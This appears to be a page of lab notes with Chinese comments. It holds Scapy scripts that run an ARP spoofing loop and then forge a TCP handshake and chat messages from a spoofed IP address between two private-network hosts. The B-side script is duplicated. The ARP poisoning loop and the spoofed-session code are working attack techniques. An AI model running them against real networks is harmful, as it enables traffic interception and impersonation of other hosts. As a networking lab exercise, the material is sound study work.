A机
222还是17看实际情况修改
ARP
victim_ip = "192.168.222.133"
ghost_ip = "192.168.222.17"
arp_pkt = ARP(op=2, pdst=victim_ip, psrc=ghost_ip)
print(f"开始 ARP 欺骗: {ghost_ip} is at My_MAC ...")
send(arp_pkt, loop=1, inter=1, verbose=0)
from scapy.all import *
# 网络配置常量
A_IP = "192.168.17.128"
B_IP = "192.168.17.129"
SRC_IP = "192.168.17.17"
A_PORT = 40033
B_PORT = 30033
# ✅ 步骤 1(A → B):SYN(第一次握手)
syn = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="S", seq=1000)
send(syn)
# 等待SYN-ACK
syn_filter = f"host {B_IP} and tcp port {A_PORT} and tcp[13] & 18 == 18" # SYN+ACK
syn_pkts = sniff(filter=syn_filter, count=1, timeout=5)
syn_ack = syn_pkts[0]
print(f"✅ 收到SYN-ACK: seq={syn_ack[TCP].seq}, ack={syn_ack[TCP].ack}")
# ✅ 步骤 3(A → B):ACK(第三次握手,完成连接)
send(IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="A", seq=1001, ack=2001))
# ✅ 步骤 5(A → B):A 发送第一条聊天消息
msg_a = "Hello B I am 17!\n"
pkt_a = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="PA", seq=1001, ack=2001)/Raw(load=msg_a)
send(pkt_a)
# 等待B的回复(等待20秒)
# 监听B的回复(PSH+ACK包)
resp_filter = f"host {B_IP} and tcp port {A_PORT} and tcp[13] & 24 == 24" # PSH+ACK
resp_pkts = sniff(filter=resp_filter, count=1, timeout=20)
resp_b = resp_pkts[0]
==================================================================================
# ✅ 步骤 6(A → B):A 发送第二条消息
msg_b_len = len(resp_b[Raw].load)
# 计算下一个序列号和确认号
next_seq = 1001 + len(msg_a)
next_ack = resp_b[TCP].seq + msg_b_len
# A发送对B回复的ACK确认
ack_pkt = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="A",
seq=next_seq, ack=next_ack)
send(ack_pkt)
# A发送第二条消息
msg2 = "How are you B?\n"
pkt2 = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="PA",
seq=next_seq, ack=next_ack)/Raw(load=msg2)
send(pkt2)
# 等待B对第二条消息的ACK
ack_filter = f"host {B_IP} and tcp port {A_PORT} and tcp[13] & 16 == 16" # ACK
ack_pkts = sniff(filter=ack_filter, count=1, timeout=10)
from scapy.all import *
# 网络配置常量
B_IP = "192.168.17.129"
SRC_IP = "192.168.17.17"
A_PORT = 40033
B_PORT = 30033
# ✅ 步骤 2(B → A):SYN+ACK(第二次握手)
syn_ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="SA", seq=2000, ack=1001)
send(syn_ack_pkt)
# ✅ 步骤 4 B计算机等A的数据包
filter_str = f"host {SRC_IP} and tcp port {B_PORT} and tcp[13] & 24 == 24" # PSH+ACK
pkts = sniff(filter=filter_str, count=1, timeout=30)
pkt_from_a = pkts[0]
# 提取消息信息
msg_a_len = len(pkt_from_a[Raw].load)
# ✅ 步骤 6(B → A):B 回复 ACK + 聊天消息
# 6a. 先单独 ACK A 的消息
ack_seq = pkt_from_a[TCP].ack
ack_ack = pkt_from_a[TCP].seq + msg_a_len
ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="A", seq=ack_seq, ack=ack_ack)
send(ack_pkt)
# 6b. B 发送自己的回复消息
msg_b = "Hello 23 I am B\n"
msg_b_len = len(msg_b)
# 计算序列号:继续使用之前的序列号
# 确认号:期望A的下一个序列号
data_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="PA", seq=ack_seq, ack=ack_ack)/Raw(load=msg_b)
send(data_pkt)
==================================================================================
# 在B发送"Hello A!"之后,需要等待A的"how are you?"消息
# 然后发送ACK确认
current_b_seq = msg_b_len + ack_seq
# 1. 首先等待A的第二条消息(PSH+ACK)
filter_howareyou = f"host {SRC_IP} and tcp port {B_PORT} and tcp[13] & 24 == 24" # PSH+ACK
pkts_howareyou = sniff(filter=filter_howareyou, count=1, timeout=30)
pkt_howareyou = pkts_howareyou[0]
howareyou_len = len(pkt_howareyou[Raw].load)
# 2. 计算ACK确认包的序列号和确认号
ack_num_howareyou = pkt_howareyou[TCP].seq + howareyou_len
# 3. 发送ACK确认包
ack_pkt_howareyou = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="A",
seq=current_b_seq, # B的当前序列号
ack=ack_num_howareyou # 确认A的数据
)
send(ack_pkt_howareyou)
msg_fine = "fine 17\n"
msg_fine_len = len(msg_fine)
data_pkt_fine = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="PA", # PSH+ACK
seq=current_b_seq,
ack=ack_num_howareyou
)/Raw(load=msg_fine)
send(data_pkt_fine)
from scapy.all import *
# 网络配置常量
B_IP = "192.168.17.129"
SRC_IP = "192.168.17.17"
A_PORT = 40033
B_PORT = 30033
# ✅ 步骤 2(B → A):SYN+ACK(第二次握手)
syn_ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="SA", seq=2000, ack=1001)
send(syn_ack_pkt)
# ✅ 步骤 4 B计算机等A的数据包
filter_str = f"host {SRC_IP} and tcp port {B_PORT} and tcp[13] & 24 == 24" # PSH+ACK
pkts = sniff(filter=filter_str, count=1, timeout=30)
pkt_from_a = pkts[0]
# 提取消息信息
msg_a_len = len(pkt_from_a[Raw].load)
# ✅ 步骤 6(B → A):B 回复 ACK + 聊天消息
# 6a. 先单独 ACK A 的消息
ack_seq = pkt_from_a[TCP].ack
ack_ack = pkt_from_a[TCP].seq + msg_a_len
ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="A", seq=ack_seq, ack=ack_ack)
send(ack_pkt)
# 6b. B 发送自己的回复消息
msg_b = "Hello 23 I am B\n"
msg_b_len = len(msg_b)
# 计算序列号:继续使用之前的序列号
# 确认号:期望A的下一个序列号
data_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="PA", seq=ack_seq, ack=ack_ack)/Raw(load=msg_b)
send(data_pkt)
==================================================================================
# 在B发送"Hello A!"之后,需要等待A的"how are you?"消息
# 然后发送ACK确认
current_b_seq = msg_b_len + ack_seq
# 1. 首先等待A的第二条消息(PSH+ACK)
filter_howareyou = f"host {SRC_IP} and tcp port {B_PORT} and tcp[13] & 24 == 24" # PSH+ACK
pkts_howareyou = sniff(filter=filter_howareyou, count=1, timeout=30)
pkt_howareyou = pkts_howareyou[0]
howareyou_len = len(pkt_howareyou[Raw].load)
# 2. 计算ACK确认包的序列号和确认号
ack_num_howareyou = pkt_howareyou[TCP].seq + howareyou_len
# 3. 发送ACK确认包
ack_pkt_howareyou = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="A",
seq=current_b_seq, # B的当前序列号
ack=ack_num_howareyou # 确认A的数据
)
send(ack_pkt_howareyou)
msg_fine = "fine 17\n"
msg_fine_len = len(msg_fine)
data_pkt_fine = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="PA", # PSH+ACK
seq=current_b_seq,
ack=ack_num_howareyou
)/Raw(load=msg_fine)
send(data_pkt_fine)
浙公网安备 33010602011771号